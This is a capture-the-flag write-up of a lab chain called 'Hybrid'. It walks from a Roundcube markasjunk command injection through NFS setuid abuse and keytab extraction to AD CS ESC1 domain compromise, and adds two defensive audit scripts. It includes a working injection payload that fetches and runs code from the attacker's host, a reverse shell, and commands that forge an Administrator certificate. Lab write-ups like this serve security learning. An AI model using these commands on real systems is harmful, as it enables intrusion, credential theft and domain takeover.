Hybrid is a chain made up of a Linux and a Windows machine. It starts with Roundcube Webmail over HTTP, where an alias identity lets you force command injection and get a reverse shell. Once on the box you find /etc/exports sharing /opt/share read-write, which allows privilege escalation to the user peter. From there you tunnel through to find an ESC1-vulnerable certificate template that lets Domain Computers supply the subject when enrolling, allowing privilege escalation to Administrator.

Initial Nmap

Two IPs to scan.

Nmap scan report for 10.10.160.197
Host is up (0.16s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-11 15:34:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-17T16:39:23
| Not valid after: 2025-07-17T16:39:23
| MD5: 4901:de71:cb50:f455:3fe3:23b1:2a87:0e2a
|_SHA-1: 74dc:f402:f306:04f6:c39f:fb8f:a1bf:f9f1:76e6:60a9
|_ssl-date: TLS randomness does not represent time
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-17T16:39:23
| Not valid after: 2025-07-17T16:39:23
| MD5: 4901:de71:cb50:f455:3fe3:23b1:2a87:0e2a
|_SHA-1: 74dc:f402:f306:04f6:c39f:fb8f:a1bf:f9f1:76e6:60a9
|_ssl-date: TLS randomness does not represent time
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-17T16:39:23
| Not valid after: 2025-07-17T16:39:23
| MD5: 4901:de71:cb50:f455:3fe3:23b1:2a87:0e2a
|_SHA-1: 74dc:f402:f306:04f6:c39f:fb8f:a1bf:f9f1:76e6:60a9
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: hybrid.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc01.hybrid.vl
| Issuer: commonName=hybrid-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-17T16:39:23
| Not valid after: 2025-07-17T16:39:23
| MD5: 4901:de71:cb50:f455:3fe3:23b1:2a87:0e2a
|_SHA-1: 74dc:f402:f306:04f6:c39f:fb8f:a1bf:f9f1:76e6:60a9
|_ssl-date: TLS randomness does not represent time
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: HYBRID
| NetBIOS_Domain_Name: HYBRID
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: hybrid.vl
| DNS_Computer_Name: dc01.hybrid.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-11-11T15:36:56+00:00
| ssl-cert: Subject: commonName=dc01.hybrid.vl
| Issuer: commonName=dc01.hybrid.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-07-16T16:48:12
| Not valid after: 2025-01-15T16:48:12
| MD5: d7ed:81b4:60b7:109f:56e3:7901:e081:2237
|_SHA-1: 95e3:a4cd:6bc8:3de4:cd9a:92c3:10e5:4e58:9951:81a4
|_ssl-date: 2024-11-11T15:37:36+00:00; 0s from scanner time.
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
| date: 2024-11-11T15:36:56
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required

Nmap scan report for 10.10.160.198
Host is up (0.16s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 60:bc:22:26:78:3c:b4:e0:6b:ea:aa:1e:c1:62:5d:de (ECDSA)
|_ 256 a3:b5:d8:61:06:e6:3a:41:88:45:e3:52:03:d2:23:1b (ED25519)
25/tcp open smtp?
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD
|_http-title: Redirecting...
|_http-server-header: nginx/1.18.0 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after: 2033-06-14T13:20:17
| MD5: 3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
|_SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
|_ssl-date: TLS randomness does not represent time
|_pop3-capabilities: CAPA UIDL SASL RESP-CODES STLS AUTH-RESP-CODE PIPELINING TOP
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 35943/tcp6 mountd
| 100005 1,2,3 38361/tcp mountd
| 100005 1,2,3 42047/udp mountd
| 100005 1,2,3 55681/udp6 mountd
| 100021 1,3,4 32856/udp nlockmgr
| 100021 1,3,4 36789/tcp6 nlockmgr
| 100021 1,3,4 37737/tcp nlockmgr
| 100021 1,3,4 60997/udp6 nlockmgr
| 100227 3 2049/tcp nfs_acl
|_ 100227 3 2049/tcp6 nfs_acl
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: more post-login LOGIN-REFERRALS OK LITERAL+ IDLE IMAP4rev1 capabilities SASL-IR ID ENABLE have Pre-login LOGINDISABLEDA0001 listed STARTTLS
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after: 2033-06-14T13:20:17
| MD5: 3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
|_SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
587/tcp open submission?
|_smtp-commands: mail01.hybrid.vl, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, AUTH PLAIN LOGIN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, CHUNKING
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: more post-login LOGIN-REFERRALS OK LITERAL+ IDLE IMAP4rev1 AUTH=LOGINA0001 SASL-IR AUTH=PLAIN ENABLE have capabilities Pre-login listed ID
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after: 2033-06-14T13:20:17
| MD5: 3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
|_SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: CAPA UIDL SASL(PLAIN LOGIN) RESP-CODES USER AUTH-RESP-CODE PIPELINING TOP
| ssl-cert: Subject: commonName=mail01
| Subject Alternative Name: DNS:mail01
| Issuer: commonName=mail01
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2023-06-17T13:20:17
| Not valid after: 2033-06-14T13:20:17
| MD5: 3837:2b81:2fb1:6f03:4360:25b4:d26b:db29
|_SHA-1: 61c2:4002:71ff:7850:e0da:4a5a:e256:e7df:666b:b008
|_ssl-date: TLS randomness does not represent time
2049/tcp open nfs_acl 3 (RPC #100227)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We have two targets; let's focus on the Linux machine first, since the other is unreachable.

HTTP

Going to the IP address redirects us to mail01.hybrid.vl, which looks to be Roundcube Webmail. Not much we can do at the moment. We'll come back 👍.

NFS

We also had NFS open on port 2049, which we can check.

$ showmount -e 10.10.168.102
Export list for 10.10.168.102:
/opt/share *

Mounting it, we see backup.tar.gz. We copy it out and extract it to find some configs and other directories.

$ sudo mount.nfs -o rw 10.10.139.134:/opt/share tmpMnt/

$ tree backup
backup
├── backup.tar.gz
├── etc
│   ├── dovecot
│   │   └── dovecot-users
│   ├── passwd
│   ├── postfix
│   │   └── main.cf
│   └── sssd
│       └── sssd.conf
└── opt
    └── certs
        └── hybrid.vl
            ├── fullchain.pem
            └── privkey.pem

8 directories, 7 files

This reveals some users from the dovecot-users file.

admin@hybrid.vl:{plain}<SNIP>
peter.turner@hybrid.vl:{plain}<SNIP>

We can try these to log in to Roundcube.

RoundCube Webmail

Using the credentials we're able to log in with both accounts. Looking at which version is installed, we see a few more plugins installed as well; the one that sticks out is markasjunk.

We can look over this blog to see how it works. Put simply, we need to use peter's account to send an email to admin and receive a shell back.

We need to change his email address a bit, or rather his identity, to peter.turner&curl${IFS}-o${IFS}/tmp/x${IFS}10.8.4.29/x${IFS}|${IFS}bash&@hybrid.vl.

Then we send an email to admin, select it, and mark it as junk. Then watch the magic happen. 🎇✨🎇
(we hope) 🤨

$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.168.102 - - [28/Apr/2025 14:03:22] "GET /x HTTP/1.1" 200 -

Hits us!!

$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.8.4.29] from (UNKNOWN) [10.10.168.102] 52370
bash: cannot set terminal process group (646): Inappropriate ioctl for device
bash: no job control in this shell
www-data@mail01:~/roundcube$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@mail01:~/roundcube$

We got our callback.

Shell as www-data

Checking the MySQL config doesn't yield much except the same users.

www-data@mail01:~/roundcube$ cat config/config.inc.php | grep -v '^//' | grep .
<?php
/* Local configuration for Roundcube Webmail */
$config['db_dsnw'] = 'mysql://roundcube:<SNIP>@localhost/roundcubemail';
$config['imap_host'] = 'localhost:143';
$config['support_url'] = '';
$config['des_key'] = 'RpiHQJt10wGZdlMAU9CnBPfc';
$config['plugins'] = ["markasjunk"];

Since NFS is running, we can check its config at /etc/exports, which yields the following:

$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#
/opt/share *(rw,no_subtree_check)

This is a good one!!! Basically, we can copy the system's /bin/bash to /opt/share (your own machine's /bin/bash might not work). Then, on our machine, create a user peter with the same uid, give ownership of the bash copy to peter and set the setuid bit on it. Finally, execute it on the victim machine.

We’re peter on the box!!✨✨

--- victim machine ---
$ cp /bin/bash /opt/share
$ id peter.turner@hybrid.vl
uid=<SNIP>(peter.turner@hybrid.vl) gid=<SNIP>(domain users@hybrid.vl) groups=<SNIP>(domain users@hybrid.vl),<SNIP>(hybridusers@hybrid.vl)
--- attacker machine ---
$ useradd -u <SNIP> -r -s /bin/bash peter
$ su peter
$ cp /opt/share/bash .
$ chmod +s bash
$ cp bash /opt/share
--- victim machine ---
$ ./bash -p
bash-5.1$ id
uid=33(www-data) gid=33(www-data) euid=90<SNIP>(peter.turner@hybrid.vl) egid=992 groups=992,33(www-data)
bash-5.1$
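As an added defender-side check (example code of my own, not from this writeup), here is a small audit of /etc/exports that flags the pattern abused above: a read-write export to any host without Kerberos, where the server trusts whatever uid/gid the client presents. The sample exports text is constructed; only the /opt/share line mirrors the one found on mail01.

```python
SAMPLE_EXPORTS = """\
# /etc/exports: the access control list for filesystems which may be exported
/opt/share *(rw,no_subtree_check)
/srv/homes 10.10.0.0/16(rw,sync,no_subtree_check)
/srv/nfs4  gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
/srv/pub   *(ro,no_subtree_check)
/srv/admin 10.10.1.5(rw,sync,no_root_squash,no_subtree_check)
"""  # constructed sample; the /opt/share line is the one found on mail01

def parse_exports(text):
    """Yield (path, host, options) for every client spec on every export line."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients:
            host, _, opts = client.partition("(")
            yield path, host, set(filter(None, opts.rstrip(")").split(",")))

def is_kerberos(host, opts):
    """With sec=krb5* (or the old gss/ host form) uids come from the principal, not the client."""
    return host.startswith("gss/") or any(o.startswith("sec=krb5") for o in opts)

def audit_exports(text):
    """Return (severity, path, host, reason) for writable exports that trust the client's uid."""
    findings = []
    for path, host, opts in parse_exports(text):
        if "rw" not in opts or is_kerberos(host, opts):
            continue
        # AUTH_SYS NFS takes whatever uid/gid the client presents, so any client
        # can plant a file owned by an arbitrary uid, setuid bit included.
        sev = "high" if host == "*" or host.startswith("*.") else "medium"
        findings.append((sev, path, host, "rw export without Kerberos: client-supplied uid/gid trusted"))
        if "no_root_squash" in opts:
            findings.append(("high", path, host, "no_root_squash: client root can write root-owned files"))
    return findings
```

Closing the hole means sec=krb5p or a tight host list on the export, and keeping the exported directory on a filesystem mounted nosuid so a planted setuid binary does nothing on the server.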

We now have the euid of peter.turner, which means we can read his home directory. It contains passwords.kdbx, a KeePass database. Getting this over to our Windows VM and opening it, it asks for a password. We can try one of the passwords we found in the dovecot-users file, which gets us in.

Root Toot!!

Now we have his domain password, and if we simply ssh to the box with it, we get a session. As an added bonus, we get root easily!!

$ ssh peter.turner@hybrid.vl@mail01.hybrid.vl          
(peter.turner@hybrid.vl@mail01.hybrid.vl) Password:

Last login: Mon Apr 28 23:17:53 2025 from 10.8.4.29
peter.turner@hybrid.vl@mail01:~$ sudo -l
[sudo] password for peter.turner@hybrid.vl:
Matching Defaults entries for peter.turner@hybrid.vl on mail01:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User peter.turner@hybrid.vl may run the following commands on mail01:
(ALL) ALL
peter.turner@hybrid.vl@mail01:~$ sudo su
root@mail01:/home/peter.turner@hybrid.vl#

Pivoting

We set up a tunnel using chisel so we can continue our enumeration. After doing so, we get a BloodHound dump.

$ proxychains4 -q nxc ldap hybrid.vl -u peter.turner -p 'b0cwR+G4Dzl_rw' --dns-server 10.10.145.149 --bloodhound -c All

Long story short, peter didn't have anything we could use to our advantage.

Seeing as AD CS is running on the machine, we can try there.

ADCS is my friend

Running Certipy, we find a template that is vulnerable to ESC1.

$ proxychains4 -q certipy find -vulnerable -dc-ip 10.10.149.117 -u peter.turner@hybrid.vl -p <SNIP> -stdout -debug
<SNIP>
[!] Vulnerabilities
ESC1 : 'HYBRID.VL\\Domain Computers' can enroll, enrollee supplies subject and template allows client authentication
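As an added example of my own (not from the writeup or from Certipy), the check below evaluates a template's LDAP attributes against the five ESC1 conditions Certipy summarised above. The flag and EKU values are from MS-CRTD; the HybridComputers dict is a constructed rendering of that finding, and harden() shows the template change that closes it.

```python
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # msPKI-Certificate-Name-Flag (MS-CRTD)
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002           # msPKI-Enrollment-Flag: CA manager approval

AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
LOW_PRIV = {"Domain Computers", "Domain Users", "Authenticated Users", "Everyone"}

# Constructed rendering of the HybridComputers template as Certipy described it above.
HYBRID_COMPUTERS = {
    "name": "HybridComputers",
    "msPKI-Certificate-Name-Flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
    "msPKI-Enrollment-Flag": 0,
    "msPKI-RA-Signature": 0,
    "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
    "enroll": ["HYBRID.VL\\Domain Computers"],
}

def esc1_conditions(t):
    """Return the ESC1 preconditions that template dict `t` satisfies."""
    met = []
    if t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        met.append("enrollee supplies subject")
    ekus = set(t.get("pKIExtendedKeyUsage", []))
    if not ekus or ekus & AUTH_EKUS:  # no EKU at all also permits client auth
        met.append("allows client authentication")
    if not t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        met.append("no manager approval")
    if t.get("msPKI-RA-Signature", 0) == 0:
        met.append("no authorized signatures required")
    enrollers = {p.split("\\")[-1] for p in t["enroll"]} & LOW_PRIV
    if enrollers:
        met.append("low-privileged enrollment: " + ", ".join(sorted(enrollers)))
    return met

def is_esc1(t):
    """ESC1 needs all five conditions at once; fixing any one of them closes it."""
    return len(esc1_conditions(t)) == 5

def harden(t):
    """Copy of `t` with enrollee-supplied subject disabled and manager approval required."""
    return {**t,
            "msPKI-Certificate-Name-Flag": t["msPKI-Certificate-Name-Flag"] & ~CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
            "msPKI-Enrollment-Flag": t["msPKI-Enrollment-Flag"] | CT_FLAG_PEND_ALL_REQUESTS}
```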

But we need a Domain Computer to do this, and we do have root on the MAIL01$ machine. We can copy its Kerberos keytab file over to our machine and use keytabextract.py.

$ keytabextract.py /home/jay/Documents/vl/chains/hybrid/krb5.keytab 
[*] RC4-HMAC Encryption detected. Will attempt to extract NTLM hash.
[*] AES256-CTS-HMAC-SHA1 key found. Will attempt hash extraction.
[*] AES128-CTS-HMAC-SHA1 hash discovered. Will attempt hash extraction.
[+] Keytab File successfully imported.
REALM : HYBRID.VL
SERVICE PRINCIPAL : MAIL01$/
NTLM HASH : <SNIP>
AES-256 HASH : <SNIP>
AES-128 HASH : <SNIP>

PrivEsc

Now we can exploit ESC1 with a couple of commands.

First, we request a certificate with the UPN Administrator, using the CA and the template name. This gives us a PFX file.

$ proxychains4 -q certipy req -dc-ip 10.10.149.117 -u 'MAIL01$@hybrid.vl' -hashes :<SNIP> -ca hybrid-DC01-CA -template HybridComputers -upn Administrator -key-size 4096 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:10.10.149.117[\pipe\cert]
[+] Connected to endpoint: ncacn_np:10.10.149.117[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 21
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'

Lastly, we authenticate with the PFX file.

$ proxychains4 -q certipy auth -pfx administrator.pfx -domain hybrid.vl -dc-ip 10.10.149.117 -debug
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@hybrid.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@hybrid.vl': <SNIP>